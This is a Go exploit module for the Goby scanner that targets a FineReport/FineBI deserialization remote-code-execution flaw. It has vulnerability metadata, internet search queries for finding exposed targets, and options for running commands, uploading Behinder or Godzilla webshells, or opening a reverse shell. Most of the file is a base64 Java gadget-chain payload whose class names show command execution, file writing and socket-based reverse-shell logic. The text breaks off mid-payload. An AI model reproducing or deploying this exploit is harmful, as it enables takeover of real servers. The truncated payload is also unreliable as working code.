package exploits

import (
	"bytes"
	"compress/gzip"
	"encoding/base64"
	"git.gobies.org/goby/goscanner/godclient"
	"git.gobies.org/goby/goscanner/goutils"
	"git.gobies.org/goby/goscanner/jsonvul"
	"git.gobies.org/goby/goscanner/scanconfig"
	"git.gobies.org/goby/httpclient"
	"net/url"
	"strings"
	"time"
)

func init() {
	expJson := `{
    "Name": "FineReport/FineBI channel  remote code execution vulnerability",
    "Description": "<p>FineReport and FineBI are enterprise-level report design and data analysis tools and business intelligence platforms developed by Fanruan Software.</p><p>FineReport and FineBI have deserialization vulnerabilities. An attacker can send carefully constructed deserialized data to the /webroot/decision/remote/design/channel interface to execute arbitrary code on the target server and obtain server permissions.</p>",
    "Impact": "<p>Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.</p>",
    "Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://help.fanruan.com/finereport/doc-view-4833.html\">https://help.fanruan.com/finereport/doc-view-4833.html</a></p>",
    "Product": "FineReport",
    "VulType": [
        "Code Execution"
    ],
    "Tags": [
        "Code Execution"
    ],
    "Translation": {
        "CN": {
            "Name": "FineReport/FineBI channel 远程代码执行漏洞",
            "Product": "帆软-FineReport",
            "Description": "<p>FineReport、FineBI 是帆软软件开发的企业级报表设计和数据分析工具与商业智能平台。</p><p><span style=\"color: var(--primaryFont-color);\">FineReport、FineBI 存在反序列化漏洞，攻击者可向 /webroot/decision/remote/design/channel 接口发送精心构造的反序列化数据，在目标服务器上执行任意代码，获取服务器权限。</span></p>",
            "Recommendation": "<p>厂商已发布了漏洞修复程序，请及时关注更新：<a href=\"https://help.fanruan.com/finereport/doc-view-4833.html\">https://help.fanruan.com/finereport/doc-view-4833.html</a><br></p>",
            "Impact": "<p>攻击者可通过该漏洞在服务器端执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。<br></p>",
            "VulType": [
                "代码执行"
            ],
            "Tags": [
                "代码执行"
            ]
        },
        "EN": {
            "Name": "FineReport/FineBI channel  remote code execution vulnerability",
            "Product": "FineReport",
            "Description": "<p>FineReport and FineBI are enterprise-level report design and data analysis tools and business intelligence platforms developed by Fanruan Software.</p><p>FineReport and FineBI have deserialization vulnerabilities. An attacker can send carefully constructed deserialized data to the /webroot/decision/remote/design/channel interface to execute arbitrary code on the target server and obtain server permissions.</p>",
            "Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://help.fanruan.com/finereport/doc-view-4833.html\">https://help.fanruan.com/finereport/doc-view-4833.html</a></p>",
            "Impact": "<p>Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.<br></p>",
            "VulType": [
                "Code Execution"
            ],
            "Tags": [
                "Code Execution"
            ]
        }
    },
    "FofaQuery": "body=\"/webroot/decision/\" || body=\"content=\\\"FineReport--Web Reporting Tool\\\"\" || title=\"FineReport\" || title=\"FineReport报表\" || title=\"FineBI\"",
    "GobyQuery": "body=\"/webroot/decision/\" || body=\"content=\\\"FineReport--Web Reporting Tool\\\"\" || title=\"FineReport\" || title=\"FineReport报表\" || title=\"FineBI\"",
    "Author": "su18@javaweb.org",
    "Homepage": "http://www.fanruansem.com/",
    "DisclosureDate": "2022-08-01",
    "References": [],
    "HasExp": true,
    "Is0day": false,
    "Level": "3",
    "CVSS": "9.0",
    "CVEIDs": [],
    "CNVD": [],
    "CNNVD": [],
    "ScanSteps": [
        "AND",
        {
            "Request": {
                "method": "GET",
                "uri": "/",
                "follow_redirect": false,
                "header": {},
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": []
        }
    ],
    "ExploitSteps": [
        "AND",
        {
            "Request": {
                "method": "GET",
                "uri": "/",
                "follow_redirect": false,
                "header": {},
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": []
        }
    ],
    "ExpParams": [
        {
            "name": "attackType",
            "type": "select",
            "value": "cmd,webshell,reverse",
            "show": ""
        },
        {
            "name": "cmd",
            "type": "input",
            "value": "whoami",
            "show": "attackType=cmd"
        },
        {
            "name": "filename",
            "type": "input",
            "value": "abc.jsp",
            "show": "attackType=webshell,webshell=custom"
        },
        {
            "name": "content",
            "type": "input",
            "value": "<% out.println(\"hello\");%>",
            "show": "attackType=webshell,webshell=custom"
        },
        {
            "name": "webshell",
            "type": "select",
            "value": "behinder,godzilla,custom",
            "show": "attackType=webshell"
        }
    ],
    "ExpTips": {
        "type": "",
        "content": ""
    },
    "AttackSurfaces": {
        "Application": [],
        "Support": [],
        "Service": [],
        "System": [],
        "Hardware": []
    },
    "PostTime": "2023-09-27",
    "PocId": "10704"
}`

	payloadHibernate1xTomcatEcho2e357e0f := "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAEAAAABc3IAMGNvbS5mci50aGlyZC5vcmcuaGliZXJuYXRlLmVuZ2luZS5zcGkuVHlwZWRWYWx1ZRHNlE3s+MmXAgACTAAEdHlwZXQAJkxjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS90eXBlL1R5cGU7TAAFdmFsdWV0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAC1jb20uZnIudGhpcmQub3JnLmhpYmVybmF0ZS50eXBlLkNvbXBvbmVudFR5cGVPhi/eDWqxHgIADloAHGNyZWF0ZUVtcHR5Q29tcG9zaXRlc0VuYWJsZWRaABJoYXNOb3ROdWxsUHJvcGVydHlaAAVpc0tleUkADHByb3BlcnR5U3BhbkwAD2NhbkRvRXh0cmFjdGlvbnQAE0xqYXZhL2xhbmcvQm9vbGVhbjtbAAdjYXNjYWRldAA1W0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS9lbmdpbmUvc3BpL0Nhc2NhZGVTdHlsZTtMABFjb21wb25lbnRUdXBsaXplcnQAPkxjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS90dXBsZS9jb21wb25lbnQvQ29tcG9uZW50VHVwbGl6ZXI7TAAKZW50aXR5TW9kZXQAJ0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS9FbnRpdHlNb2RlO1sAC2pvaW5lZEZldGNodAAnW0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS9GZXRjaE1vZGU7WwANcHJvcGVydHlOYW1lc3QAE1tMamF2YS9sYW5nL1N0cmluZztbABNwcm9wZXJ0eU51bGxhYmlsaXR5dAACW1pbAA1wcm9wZXJ0eVR5cGVzdAAnW0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS90eXBlL1R5cGU7WwAhcHJvcGVydHlWYWx1ZUdlbmVyYXRpb25TdHJhdGVnaWVzdAAzW0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS90dXBsZS9WYWx1ZUdlbmVyYXRpb247TAAJdHlwZVNjb3BldAA3TGNvbS9mci90aGlyZC9vcmcvaGliZXJuYXRlL3R5cGUvVHlwZUZhY3RvcnkkVHlwZVNjb3BlO3hyACxjb20uZnIudGhpcmQub3JnLmhpYmVybmF0ZS50eXBlLkFic3RyYWN0VHlwZdSFzZCgTuYBAgAAeHAAAAAAAAABcHBzcgBAY29tLmZyLnRoaXJkLm9yZy5oaWJlcm5hdGUudHVwbGUuY29tcG9uZW50LlBvam9Db21wb25lbnRUdXBsaXplcsB1agfG/lhhAgAETAAOY29tcG9uZW50Q2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wACW9wdGltaXplcnQAPUxjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS9ieXRlY29kZS9zcGkvUmVmbGVjdGlvbk9wdGltaXplcjtMAAxwYXJlbnRHZXR0ZXJ0ADdMY29tL2ZyL3RoaXJkL29yZy9oaWJlcm5hdGUvcHJvcGVydHkvYWNjZXNzL3NwaS9HZXR0ZXI7TAAMcGFyZW50U2V0dGVydAA3TGNvbS9mci90aGlyZC9vcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hyAERjb20uZnIudGhpcmQub3JnLmhpYmVybmF0ZS50dXBsZS5jb21wb25lbnQuQWJzdHJhY3RDb21wb25lbnRUdXBsaXplclYh0m2wkLa/AgAFWgASaGFzQ3VzdG9tQWNjZXNzb3JzSQAMcHJvcGVydHlTcGFuWwAHZ2V0dGVyc3QAOFtMY29tL2ZyL3RoaXJkL29yZy9oaWJlcm5hdGUvcHJvcGVydHkvYWNjZXNzL3NwaS9HZXR0ZXI7TAAMaW5zdGFudGlhdG9ydAAvTGNvbS9mci90aGlyZC9vcmcvaGliZXJuYXRlL3R1cGxlL0luc3RhbnRpYXRvcjtbAAdzZXR0ZXJzdAA4W0xjb20vZnIvdGhpcmQvb3JnL2hpYmVybmF0ZS9wcm9wZXJ0eS9hY2Nlc3Mvc3BpL1NldHRlcjt4cAAAAAAAdXIAOFtMY29tLmZyLnRoaXJkLm9yZy5oaWJlcm5hdGUucHJvcGVydHkuYWNjZXNzLnNwaS5HZXR0ZXI7YUHVB0rncEwCAAB4cAAAAAFzcgBKY29tLmZyLnRoaXJkLm9yZy5oaWJlcm5hdGUucHJvcGVydHkuYWNjZXNzLnNwaS5HZXR0ZXJNZXRob2RJbXBsJFNlcmlhbEZvcm0PcbISueRE8gIABEwADmNvbnRhaW5lckNsYXNzcQB+ABRMAA5kZWNsYXJpbmdDbGFzc3EAfgAUTAAKbWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wADHByb3BlcnR5TmFtZXEAfgAgeHB2cgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+ACBMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cHEAfgAmdAATZ2V0T3V0cHV0UHJvcGVydGllc3QAEE91dHB1dFByb3BlcnRpZXNwcHBwcHBwcHBwcHBwc3EAfgAiAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAlCsr+ur4AAAA0AfAKAB4BBQoARgEGCgBGAQcKAB4BCAgAtAoAHAEJCgEKAQsKAQoBDAcAtQoARgENCADdCgAhAQ4IAQ8IARAHAREIARIIARMHARQKABwBFQgBFggAqgcBFwsAFgEYCwEZARoLARkBGwgAoQgBHAcBHQoAHAEeBwEfCgEgASEIASIHASMIAKQKAJEBJAoAIQElCAEmCQEnASgKAScBKQgBKgoAkQErCgAcASwIAS0HAKYKABwBLggBLwcBMAgBMQgBMgoAHAEzBwE0CgBGATUKATYBKwgBNwoAIQE4CAE5CgAhAToIATsKACEBPAgBPQoAIQE+CAE/CgCRAUAIAUEKACEBQggBQwkAkQFECgEnAUUJAJEBRgcBRwoARgFICgBGAUkIAOkIAUoIAUsKAJEBTAgBTQoAkQFOBwFPCgBPAVAHAVEKAFEBUgoAkQFTCgBRAVQKAFEBVQoAUQFWCgAvAVcKAE8BWAgBWQoBWgFbCgAhAVwIAV0IAV4IAV8HAWAKAF8BBQoAXwFhCAFiCgBfAVcIAWMIAWQIAWUIAWYKAWcBaAoBZwFpBwFqCgFrAWwKAGoBbQgBbgoAagFvCgBqARoKAGoBcAoBawFxCgFrAXIIAXMIAXQKAWcBdQcBdgoAdgF3CgB2AWwKAWsBeAoAdgF4CgB2AXkKAXoBewoBegF8CgF9AX4KAX0BVQUAAAAAAAAAMgoARgF/CgFrAYAKAHYBVggBgQoALwGCCAGDCAGECgEnAYUKAJEBhggBhwgBiAgBiQgA/QgA+ggBigcBiwEAAmlwAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEcG9ydAEAE0xqYXZhL2xhbmcvSW50ZWdlcjsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQABZQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQADY2xzAQARTGphdmEvbGFuZy9DbGFzczsBAAR2YXI1AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADcmVxAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcmVzcAEAA2NtZAEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQAKdGhyZWFkTmFtZQEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQAEdGhpcwEABExBNDsBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAE0xqYXZhL3V0aWwvTGlzdDwqPjsBAA1TdGFja01hcFRhYmxlBwGLBwGMBwGNBwFHBwEjBwEfBwEUBwEXBwGOBwEwAQAKRXhjZXB0aW9ucwEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBACJMamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb247AQAEbmFtZQcBNAEACVNpZ25hdHVyZQEAKChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczwqPjsBAAVwcm94eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAIaG9zdEluZm8BABNbTGphdmEvbGFuZy9TdHJpbmc7AQALc3BsaXRSZXN1bHQBAAVwYXJhbQcAzwEABXdyaXRlAQA4KExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABBmaWxlT3V0cHV0U3RyZWFtAQAaTGphdmEvaW8vRmlsZU91dHB1dFN0cmVhbTsBAAhmaWxlUGF0aAEAB2NvbnRlbnQBAARmaWxlAQAOTGphdmEvaW8vRmlsZTsHAU8BAApjbGVhclBhcmFtAQAEZXhlYwEACmV4ZWN1dGVDbWQBAAFzAQATTGphdmEvdXRpbC9TY2FubmVyOwEABm91dHB1dAEAAm9zAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsHAY8HAWoHAWAHAZABAAdyZXZlcnNlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0kpTGphdmEvbGFuZy9TdHJpbmc7AQAJc2hlbGxQYXRoAQABcAEAEUxqYXZhL25ldC9Tb2NrZXQ7AQACcGkBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAAJwZQEAAnNpAQACcG8BABZMamF2YS9pby9PdXRwdXRTdHJlYW07AQACc28BAAFJBwF2BwGRBwGSAQADcnVuAQAGZGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAEmJhc2U2NERlY29kZXJDbGFzcwEACmdldERlY29kZXIBABhhcGFjaGVDb21tb25zQmFzZTY0Q2xhc3MBAB9hcGFjaGVDb21tb25zQmFzZTY0RGVjb2RlTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAxiYXNlNjRTdHJpbmcBAAxkZWNvZGVkQnl0ZXMBAApTb3VyY2VGaWxlAQAHQTQuamF2YQwAlgCXDAGTAZQMAZUBlgwBlwGYDAGZAZoHAY0MAZsBnAwBnQGeDAGfAaAMAaEBogEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAGjAZgBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwBpAGlBwGODAGmAacMAagBqQEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDAGqAasBABBqYXZhL2xhbmcvT2JqZWN0BwGsDAGtAa4BAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nDADMAM0MAa8BsAEACXNldFN0YXR1cwcBsQwBsgCeDAGzAbQBACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Zi5CeXRlQ2h1bmsMAMUAxgwBtQGpAQAIc2V0Qnl0ZXMMAbYBqwEAB2RvV3JpdGUBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAbcAxgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uDAG4AbkHAboBAAAMAbsBvAEAEGNvbW1hbmQgbm90IG51bGwMAb0BoAEABSMjIyMjDAG+Ab8BAAdodHRwOi8vDAHAAcEBAAhodHRwczovLwwA3ADNAQABOgwBwgHDAQAiY29tbWFuZCByZXZlcnNlIGhvc3QgZm9ybWF0IGVycm9yIQwAkgCTDAHEAcUMAJQAlQEAEGphdmEvbGFuZy9UaHJlYWQMAJYBxgwBxwCXAQAFJCQkJCQBABJmaWxlIGZvcm1hdCBlcnJvciEMANMA1AEABUBAQEBADADdAM0BAAxqYXZhL2lvL0ZpbGUMAJYByAEAGGphdmEvaW8vRmlsZU91dHB1dFN0cmVhbQwAlgHJDAD6APsMANMBygwBywCXDAHMAJcMAc0BoAwBzgGgAQAHb3MubmFtZQcBzwwB0ADNDAHRAaABAAN3aW4BAARwaW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwB0gHTAQAFIC1uIDQBAAIvYwEABSAtdCA0AQACc2gBAAItYwcB1AwB1QHWDADdAdcBABFqYXZhL3V0aWwvU2Nhbm5lcgcBjwwB2AHZDACWAdoBAAJcYQwB2wHcDAGoAaAMAd0B2QwB3gCXAQAHL2Jpbi9zaAEAB2NtZC5leGUMAN0B3wEAD2phdmEvbmV0L1NvY2tldAwAlgHgDAHhAeIMAeMBpwcBkQwB5AHlDAHmAeUHAZIMANMB5wwB6AHpDAHqAeUBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyAtPgwB6wGgAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAewB5QwA6QDqAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBACZvcmcuYXBhY2hlLmNvbW1vbnMuY29kZWMuYmluYXJ5LkJhc2U2NAEAAkE0AQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABJqYXZhL3V0aWwvSXRlcmF0b3IBABFqYXZhL2xhbmcvUHJvY2VzcwEAE2phdmEvbGFuZy9UaHJvd2FibGUBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAUamF2YS9pby9PdXRwdXRTdHJlYW0BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQANZ2V0U3VwZXJjbGFzcwEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtuZXdJbnN0YW5jZQEAEWdldERlY2xhcmVkTWV0aG9kAQAHZm9yTmFtZQEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAR0cmltAQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgEAB3JlcGxhY2UBAEQoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KUxqYXZhL2xhbmcvU3RyaW5nOwEABXNwbGl0AQAnKExqYXZhL2xhbmcvU3RyaW5nOylbTGphdmEvbGFuZy9TdHJpbmc7AQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBABcoTGphdmEvbGFuZy9SdW5uYWJsZTspVgEABXN0YXJ0AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARKExqYXZhL2lvL0ZpbGU7KVYBAAUoW0IpVgEABWZsdXNoAQAFY2xvc2UBAAh0b1N0cmluZwEAD2dldEFic29sdXRlUGF0aAEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAA5nZXRFcnJvclN0cmVhbQEAB2Rlc3Ryb3kBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABYoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlYW07AQAIaXNDbG9zZWQBAAlhdmFpbGFibGUBAAMoKUkBAARyZWFkAQAEKEkpVgEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEACmdldE1lc3NhZ2UBAAhpbnRWYWx1ZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAe0KAe4BBQAhAJEB7gABAA8AAgACAJIAkwAAAAIAlACVAAAACQABAJYAlwACAJgAAAVyAAYAEwAAAo4qtwHvuAACtgADTCu2AAQSBbYABk0sBLYABywrtgAIwAAJwAAJTi06BBkEvjYFAzYGFQYVBaICWBkEFQYyOgcZB8cABqcCQxkHtgAKOggZCBILtgAMmgANGQgSDbYADJoABqcCJRkHtgAEEg62AAZNLAS2AAcsGQe2AAg6CRkJwQAPmgAGpwICGQm2AAQSELYABk0sBLYABywZCbYACDoJGQm2AAQSEbYABk2nABY6ChkJtgAEtgATtgATEhG2AAZNLAS2AAcsGQm2AAg6CRkJtgAEtgATEhS2AAZNpwAQOgoZCbYABBIUtgAGTSwEtgAHLBkJtgAIOgkZCbYABBIVtgAGTSwEtgAHLBkJtgAIwAAWwAAWOgoZCrkAFwEAOgsZC7kAGAEAmQFbGQu5ABkBADoMGQy2AAQSGrYABk0sBLYABywZDLYACDoNGQ22AAQSGwO9ABy2AB0ZDQO9AB62AB86DhkNtgAEEiAEvQAcWQMSIVO2AB0ZDQS9AB5ZAxIiU7YAH8AAIToPGQ/HAAan/5EqGQ+2ACO2ACQ6EBkOtgAEEiUEvQAcWQOyACZTtgAdGQ4EvQAeWQMRAMi4ACdTtgAfVyoSKLYAKToRGRG2ACo6CRkREisGvQAcWQMSLFNZBLIAJlNZBbIAJlO2AC0ZCQa9AB5ZAxkQU1kEA7gAJ1NZBRkQvrgAJ1O2AB9XGQ62AAQSLgS9ABxZAxkRU7YAHRkOBL0AHlkDGQlTtgAfV6cATzoRKhIwtgApOhIZEhIxBL0AHFkDEixTtgAtGRIEvQAeWQMZEFO2AB86CRkOtgAEEi4EvQAcWQMZElO2AB0ZDgS9AB5ZAxkJU7YAH1enAA6nAAU6CIQGAaf9p7EABwCgAKsArgASAM4A3ADfABIBxAIwAjMALwA/AEQChQAvAEcAYgKFAC8AZQCFAoUALwCIAn8ChQAvAAQAmQAAAN4ANwAAABMABAAUAAsAFQAVABYAGgAXACYAGQA/ABsARwAcAE4AHQBlAB4AcAAfAHUAIAB9ACEAiAAiAJMAIwCYACQAoAAmAKsAKQCuACcAsAAoAMEAKgDGACsAzgAtANwAMADfAC4A4QAvAOwAMQDxADIA+QAzAQQANAEJADUBFwA2ATMANwE+ADgBQwA5AUsAOgFkADsBigA8AY8APQGSAD8BnQBAAcQAQgHMAEMB0wBEAg4ARQIwAEoCMwBGAjUARwI9AEgCXQBJAn8ASwKCAE8ChQBNAocAGQKNAFEAmgAAALYAEgCwABEAmwCcAAoA4QALAJsAnAAKAcwAZACdAJ4AEQI9AEIAnQCeABICNQBKAJ8AoAARAUsBNwChAKIADQFkAR4AowCiAA4BigD4AKQAkwAPAZ0A5QClAKYAEAEzAU8ApwCiAAwATgI0AKgAkwAIAH0CBQCpAKIACQEXAWsAqgCrAAoAPwJIAKwArQAHAAACjgCuAK8AAAALAoMAsACxAAEAFQJ5ALIAswACACYCaAC0ALUAAwC2AAAAIAADAcwAZACdALcAEQI9AEIAnQC3ABIBFwFrAKoAuAAKALkAAADUABH/ADEABwcAugcAuwcAvAcACQcACQEBAAD8ABUHAL38ABoHAL4C/AAiBwC/ZQcAwBJdBwDADP0AMwcAwQcAwv8AcQAQBwC6BwC7BwC8BwAJBwAJAQEHAL0HAL4HAL8HAMEHAMIHAL8HAL8HAL8HAL4AAP8AoAARBwC6BwC7BwC8BwAJBwAJAQEHAL0HAL4HAL8HAMEHAMIHAL8HAL8HAL8HAL4HACwAAQcAw/sAS/8AAgAIBwC6BwC7BwC8BwAJBwAJAQEHAL0AAEIHAMP6AAH4AAUAxAAAAAQAAQAvAAEAxQDGAAMAmAAAAGsAAgADAAAAESu4ADKwTbgAArYANCu2ADWwAAEAAAAEAAUAMwADAJkAAAAOAAMAAABcAAUAXQAGAF4AmgAAACAAAwAGAAsAmwDHAAIAAAARAK4ArwAAAAAAEQDIAJMAAQC5AAAABgABRQcAyQDEAAAABAABADMAygAAAAIAywABAMwAzQABAJgAAAFqAAQABAAAAKsrxgAMEjYrtgA3mQAGEjiwK7YAOUwrEjq2ADuZAEsrEjwSNrYAPRI+Eja2AD1MKiu3AD8SQLYAQU0svgWfAAYSQrAqLAMytQBDKiwEMrgARLgAJ7UARbsARlkqtwBHTi22AEgSSbArEkq2ADuZACIqK7cAPxJAtgBBTSy+BZ8ABhJLsCosAzIsBDK2AEywKxJNtgA7mQANKiortwA/tgBOsCoqK7cAP7YATrAAAAADAJkAAABWABUAAABpAA0AagAQAGwAFQBtAB4AbwAuAHAAOQBxAD8AcgBCAHQASQB1AFYAdgBfAHcAYwB4AGYAeQBvAHoAegB7AIAAfACDAH4AjgB/AJcAgAChAIIAmgAAADQABQA5AC0AzgDPAAIAXwAHAKwArQADAHoAFADQAM8AAgAAAKsArgCvAAAAAACrANEAkwABALkAAAAXAAcNAvwAMQcA0voAI/wAHAcA0voAChIAAQDTANQAAQCYAAAA2QADAAUAAAA2uwBPWSu3AFBOuwBRWS23AFI6BBkELLgAU7YAVBkEtgBVGQS2AFanAAs6BBkEtgBXsC22AFiwAAEACQAmACkALwADAJkAAAAmAAkAAACOAAkAkAATAJEAHACSACEAkwAmAJYAKQCUACsAlQAxAJcAmgAAAD4ABgATABMA1QDWAAQAKwAGAJsAoAAEAAAANgCuAK8AAAAAADYA1wCTAAEAAAA2ANgAkwACAAkALQDZANoAAwC5AAAAGQAC/wApAAQHALoHAL4HAL4HANsAAQcAwwcAAgDcAM0AAQCYAAAASwADAAIAAAAXKxI6Ej